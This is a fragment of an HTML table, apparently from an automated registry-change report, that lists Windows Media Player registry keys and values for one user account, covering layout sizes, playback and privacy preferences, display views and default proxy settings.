<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz</span></td>
<td><span style="color: black; font-size: xx-small;">Prefs</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"mute;False"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">InitFlags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">ShowHorizontalSeparator</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">ShowVerticalSeparator</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">PlaylistWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000ba</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">PlaylistHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">SettingsWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">SettingsHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000087</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000ba</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000a0</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">CaptionsHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Settings</span></td>
<td><span style="color: black; font-size: xx-small;">Client ID</span></td>
<td><span style="color: black; font-size: xx-small;">"{43209BE6-BD53-40A7-9DD3-50364635A3E4}"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">AcceptedPrivacyStatement</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataRetrieval</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">SendUserGUID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">SilentAcquisition</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UsageTracking</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">DisableMRU</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LaunchIndex</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">AppColorLimited</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">FirstRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">X</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Y</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Width</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"686"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Height</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"536"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Maximized</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Volume</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000032</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ModeShuffle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ModeLoop</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Mute</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Balance</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentEffectType</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Battery"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentEffectPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">VideoZoom</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShrinkToFit</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowEffects</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowFullScreenPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingQuickHide</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowTitles</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowCaptions</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingMetadata</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingSettings</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">VizAutoSelect</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentSettingsView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"EQView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentMetadataView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MediaInfoView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentSettingsPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentMetadataPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPSettingsView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"EQView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPMetadataView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MediaInfoView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPSettingsPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPMetadataPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPShowSettings</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPShowMetadata</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowAlbumArt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">RandomFolderName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0009236B"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylistQuery</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylistIndex</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000050</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000006db</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000022a</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
